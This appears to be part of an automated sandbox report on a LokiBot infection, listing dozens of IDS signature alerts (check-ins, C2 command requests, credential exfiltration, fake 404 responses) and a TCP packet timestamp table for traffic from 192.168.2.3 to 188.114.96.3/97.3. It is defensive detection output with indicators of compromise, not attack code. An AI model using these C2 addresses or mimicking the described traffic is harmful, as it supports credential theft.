                  192.168.2.3188.114.97.349850802024313 08/11/22-06:43:33.879385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349777802025381 08/11/22-06:42:45.276948TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349796802025381 08/11/22-06:43:04.193279TCP2025381ET TROJAN LokiBot Checkin4979680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349867802024318 08/11/22-06:43:45.824252TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349790802024318 08/11/22-06:42:56.651534TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349859802021641 08/11/22-06:43:42.759258TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349896802825766 08/11/22-06:44:07.789189TCP2825766ETPRO TROJAN LokiBot Checkin M24989680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349832802024318 08/11/22-06:43:19.747801TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349795802024318 08/11/22-06:43:03.020333TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349890802021641 08/11/22-06:44:03.457387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349760802025381 08/11/22-06:42:32.923604TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349795802024313 08/11/22-06:43:03.020333TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979580192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349887802024313 08/11/22-06:43:58.405291TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349759802024318 08/11/22-06:42:31.695874TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349754802024318 08/11/22-06:42:26.308314TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349778802825766 08/11/22-06:42:46.945645TCP2825766ETPRO TROJAN LokiBot Checkin M24977880192.168.2.3188.114.97.3
                  188.114.96.3192.168.2.380498852025483 08/11/22-06:43:55.477446TCP2025483ET TROJAN LokiBot Fake 404 Response8049885188.114.96.3192.168.2.3
                  192.168.2.3188.114.97.349796802825766 08/11/22-06:43:04.193279TCP2825766ETPRO TROJAN LokiBot Checkin M24979680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349742802024312 08/11/22-06:42:12.661275TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349759802024313 08/11/22-06:42:31.695874TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349898802024318 08/11/22-06:44:09.907279TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349748802021641 08/11/22-06:42:19.613257TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349895802024318 08/11/22-06:44:06.157277TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349747802825766 08/11/22-06:42:18.537201TCP2825766ETPRO TROJAN LokiBot Checkin M24974780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349798802025381 08/11/22-06:43:06.576803TCP2025381ET TROJAN LokiBot Checkin4979880192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349888802025381 08/11/22-06:44:00.133246TCP2025381ET TROJAN LokiBot Checkin4988880192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349792802024318 08/11/22-06:42:59.404301TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349797802021641 08/11/22-06:43:05.379365TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349895802024313 08/11/22-06:44:06.157277TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349754802021641 08/11/22-06:42:26.308314TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349852802024313 08/11/22-06:43:38.361573TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349785802024318 08/11/22-06:42:51.879415TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349794802021641 08/11/22-06:43:01.964847TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349884802024318 08/11/22-06:43:54.330408TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988480192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349755802021641 08/11/22-06:42:27.395952TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349892802021641 08/11/22-06:44:04.916628TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349792802024313 08/11/22-06:42:59.404301TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349753802825766 08/11/22-06:42:25.207102TCP2825766ETPRO TROJAN LokiBot Checkin M24975380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349757802024313 08/11/22-06:42:29.610436TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349785802024313 08/11/22-06:42:51.879415TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349782802024313 08/11/22-06:42:50.570997TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349805802025381 08/11/22-06:43:09.287221TCP2025381ET TROJAN LokiBot Checkin4980580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349867802021641 08/11/22-06:43:45.824252TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349786802825766 08/11/22-06:42:53.219319TCP2825766ETPRO TROJAN LokiBot Checkin M24978680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349782802024318 08/11/22-06:42:50.570997TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349788802021641 08/11/22-06:42:54.331478TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349743802025381 08/11/22-06:42:14.045456TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349881802825766 08/11/22-06:43:50.015660TCP2825766ETPRO TROJAN LokiBot Checkin M24988180192.168.2.3188.114.97.3
                  188.114.97.3192.168.2.380497852025483 08/11/22-06:42:51.983930TCP2025483ET TROJAN LokiBot Fake 404 Response8049785188.114.97.3192.168.2.3
                  192.168.2.3188.114.96.349756802024318 08/11/22-06:42:28.447484TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975680192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349793802024313 08/11/22-06:43:00.645450TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349744802825766 08/11/22-06:42:15.052087TCP2825766ETPRO TROJAN LokiBot Checkin M24974480192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349746802024318 08/11/22-06:42:17.452589TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349791802021641 08/11/22-06:42:58.117986TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979180192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349793802024318 08/11/22-06:43:00.645450TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349885802825766 08/11/22-06:43:55.376397TCP2825766ETPRO TROJAN LokiBot Checkin M24988580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349823802825766 08/11/22-06:43:13.321407TCP2825766ETPRO TROJAN LokiBot Checkin M24982380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349897802024318 08/11/22-06:44:08.828123TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349830802025381 08/11/22-06:43:16.837786TCP2025381ET TROJAN LokiBot Checkin4983080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349853802825766 08/11/22-06:43:40.660156TCP2825766ETPRO TROJAN LokiBot Checkin M24985380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349884802024313 08/11/22-06:43:54.330408TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988480192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349852802024318 08/11/22-06:43:38.361573TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349757802024318 08/11/22-06:42:29.610436TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349817802825766 08/11/22-06:43:11.901228TCP2825766ETPRO TROJAN LokiBot Checkin M24981780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349758802825766 08/11/22-06:42:30.656105TCP2825766ETPRO TROJAN LokiBot Checkin M24975880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349889802025381 08/11/22-06:44:01.764745TCP2025381ET TROJAN LokiBot Checkin4988980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349828802021641 08/11/22-06:43:14.503252TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349751802021641 08/11/22-06:42:22.964431TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349786802021641 08/11/22-06:42:53.219319TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349811802024318 08/11/22-06:43:10.662100TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349898802024313 08/11/22-06:44:09.907279TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349805802021641 08/11/22-06:43:09.287221TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349817802024313 08/11/22-06:43:11.901228TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349828802825766 08/11/22-06:43:14.503252TCP2825766ETPRO TROJAN LokiBot Checkin M24982880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349817802024318 08/11/22-06:43:11.901228TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24981780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349794802825766 08/11/22-06:43:01.964847TCP2825766ETPRO TROJAN LokiBot Checkin M24979480192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349885802024313 08/11/22-06:43:55.376397TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349751802025381 08/11/22-06:42:22.964431TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349753802021641 08/11/22-06:42:25.207102TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349823802021641 08/11/22-06:43:13.321407TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349879802021641 08/11/22-06:43:48.403290TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349785802825766 08/11/22-06:42:51.879415TCP2825766ETPRO TROJAN LokiBot Checkin M24978580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349883802825766 08/11/22-06:43:53.308240TCP2825766ETPRO TROJAN LokiBot Checkin M24988380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349750802024313 08/11/22-06:42:21.832277TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349788802025381 08/11/22-06:42:54.331478TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349896802024313 08/11/22-06:44:07.789189TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349748802825766 08/11/22-06:42:19.613257TCP2825766ETPRO TROJAN LokiBot Checkin M24974880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349750802024318 08/11/22-06:42:21.832277TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349748802025381 08/11/22-06:42:19.613257TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349751802825766 08/11/22-06:42:22.964431TCP2825766ETPRO TROJAN LokiBot Checkin M24975180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349793802025381 08/11/22-06:43:00.645450TCP2025381ET TROJAN LokiBot Checkin4979380192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349756802021641 08/11/22-06:42:28.447484TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349746802024313 08/11/22-06:42:17.452589TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349882802025381 08/11/22-06:43:51.663595TCP2025381ET TROJAN LokiBot Checkin4988280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349791802025381 08/11/22-06:42:58.117986TCP2025381ET TROJAN LokiBot Checkin4979180192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349840802825766 08/11/22-06:43:28.505356TCP2825766ETPRO TROJAN LokiBot Checkin M24984080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349766802825766 08/11/22-06:42:42.773950TCP2825766ETPRO TROJAN LokiBot Checkin M24976680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349795802825766 08/11/22-06:43:03.020333TCP2825766ETPRO TROJAN LokiBot Checkin M24979580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349896802024318 08/11/22-06:44:07.789189TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349766802024318 08/11/22-06:42:42.773950TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349828802025381 08/11/22-06:43:14.503252TCP2025381ET TROJAN LokiBot Checkin4982880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349747802024318 08/11/22-06:42:18.537201TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349764802024318 08/11/22-06:42:41.209817TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349898802025381 08/11/22-06:44:09.907279TCP2025381ET TROJAN LokiBot Checkin4989880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349795802021641 08/11/22-06:43:03.020333TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349774802025381 08/11/22-06:42:44.099150TCP2025381ET TROJAN LokiBot Checkin4977480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349747802024313 08/11/22-06:42:18.537201TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349840802025381 08/11/22-06:43:28.505356TCP2025381ET TROJAN LokiBot Checkin4984080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349752802021641 08/11/22-06:42:24.044623TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349788802825766 08/11/22-06:42:54.331478TCP2825766ETPRO TROJAN LokiBot Checkin M24978880192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349892802024318 08/11/22-06:44:04.916628TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349750802825766 08/11/22-06:42:21.832277TCP2825766ETPRO TROJAN LokiBot Checkin M24975080192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349797802024318 08/11/22-06:43:05.379365TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349749802024318 08/11/22-06:42:20.745320TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349881802025381 08/11/22-06:43:50.015660TCP2025381ET TROJAN LokiBot Checkin4988180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349883802024318 08/11/22-06:43:53.308240TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349794802024313 08/11/22-06:43:01.964847TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979480192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349875802025381 08/11/22-06:43:47.334573TCP2025381ET TROJAN LokiBot Checkin4987580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349892802024313 08/11/22-06:44:04.916628TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349755802024313 08/11/22-06:42:27.395952TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349838802025381 08/11/22-06:43:24.421881TCP2025381ET TROJAN LokiBot Checkin4983880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349786802025381 08/11/22-06:42:53.219319TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349794802024318 08/11/22-06:43:01.964847TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979480192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349764802024313 08/11/22-06:42:41.209817TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.3188.114.96.3
                  192.168.2.3188.114.96.349749802024313 08/11/22-06:42:20.745320TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349757802021641 08/11/22-06:42:29.610436TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349785802021641 08/11/22-06:42:51.879415TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349883802024313 08/11/22-06:43:53.308240TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14988380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349766802021641 08/11/22-06:42:42.773950TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349867802024313 08/11/22-06:43:45.824252TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349805802825766 08/11/22-06:43:09.287221TCP2825766ETPRO TROJAN LokiBot Checkin M24980580192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349850802025381 08/11/22-06:43:33.879385TCP2025381ET TROJAN LokiBot Checkin4985080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349777802024318 08/11/22-06:42:45.276948TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349853802025381 08/11/22-06:43:40.660156TCP2025381ET TROJAN LokiBot Checkin4985380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349782802021641 08/11/22-06:42:50.570997TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349811802825766 08/11/22-06:43:10.662100TCP2825766ETPRO TROJAN LokiBot Checkin M24981180192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349744802025381 08/11/22-06:42:15.052087TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349761802025381 08/11/22-06:42:34.002289TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349778802024313 08/11/22-06:42:46.945645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349763802825766 08/11/22-06:42:39.324991TCP2825766ETPRO TROJAN LokiBot Checkin M24976380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349852802825766 08/11/22-06:43:38.361573TCP2825766ETPRO TROJAN LokiBot Checkin M24985280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349777802024313 08/11/22-06:42:45.276948TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349758802025381 08/11/22-06:42:30.656105TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.3188.114.97.3
                  188.114.97.3192.168.2.380497982025483 08/11/22-06:43:06.684563TCP2025483ET TROJAN LokiBot Fake 404 Response8049798188.114.97.3192.168.2.3
                  192.168.2.3188.114.97.349757802825766 08/11/22-06:42:29.610436TCP2825766ETPRO TROJAN LokiBot Checkin M24975780192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349798802825766 08/11/22-06:43:06.576803TCP2825766ETPRO TROJAN LokiBot Checkin M24979880192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349859802825766 08/11/22-06:43:42.759258TCP2825766ETPRO TROJAN LokiBot Checkin M24985980192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349823802024318 08/11/22-06:43:13.321407TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349763802021641 08/11/22-06:42:39.324991TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.3188.114.97.3
                  192.168.2.3188.114.97.349742802025381 08/11/22-06:42:12.661275TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349885802024318 08/11/22-06:43:55.376397TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24988580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349852802021641 08/11/22-06:43:38.361573TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349755802024318 08/11/22-06:42:27.395952TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349797802024313 08/11/22-06:43:05.379365TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349887802025381 08/11/22-06:43:58.405291TCP2025381ET TROJAN LokiBot Checkin4988780192.168.2.3188.114.96.3
                  192.168.2.3188.114.97.349830802825766 08/11/22-06:43:16.837786TCP2825766ETPRO TROJAN LokiBot Checkin M24983080192.168.2.3188.114.97.3
                  192.168.2.3188.114.96.349756802825766 08/11/22-06:42:28.447484TCP2825766ETPRO TROJAN LokiBot Checkin M24975680192.168.2.3188.114.96.3
                  TimestampSource PortDest PortSource IPDest IP
                  Aug 11, 2022 06:42:12.641289949 CEST4974280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:12.658476114 CEST8049742188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:12.658581972 CEST4974280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:12.661274910 CEST4974280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:12.678405046 CEST8049742188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:12.678615093 CEST4974280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:12.695673943 CEST8049742188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:12.770203114 CEST8049742188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:12.770303965 CEST8049742188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:12.770360947 CEST4974280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:12.773736954 CEST4974280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:12.787421942 CEST8049742188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:14.025392056 CEST4974380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:14.042526960 CEST8049743188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:14.042761087 CEST4974380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:14.045455933 CEST4974380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:14.062542915 CEST8049743188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:14.062895060 CEST4974380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:14.080081940 CEST8049743188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:14.156966925 CEST8049743188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:14.157006025 CEST8049743188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:14.157121897 CEST4974380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:14.157250881 CEST4974380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:14.174371004 CEST8049743188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:15.032388926 CEST4974480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:15.049277067 CEST8049744188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:15.049468040 CEST4974480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:15.052087069 CEST4974480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:15.068974972 CEST8049744188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:15.069155931 CEST4974480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:15.086220026 CEST8049744188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:15.165085077 CEST8049744188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:15.165282965 CEST4974480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:15.182149887 CEST8049744188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:15.385853052 CEST8049744188.114.96.3192.168.2.3
                  Aug 11, 2022 06:42:15.386019945 CEST4974480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:42:16.141204119 CEST4974580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:16.158157110 CEST8049745188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:16.158272028 CEST4974580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:16.160936117 CEST4974580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:16.177822113 CEST8049745188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:16.177916050 CEST4974580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:16.194792032 CEST8049745188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:16.296185017 CEST8049745188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:16.296262026 CEST8049745188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:16.296331882 CEST4974580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:16.296387911 CEST4974580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:16.313214064 CEST8049745188.114.97.3192.168.2.3
                  Aug 11, 2022 06:42:17.432554007 CEST4974680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:42:17.449594975 CEST8049746188.114.97.3192.168.2.3
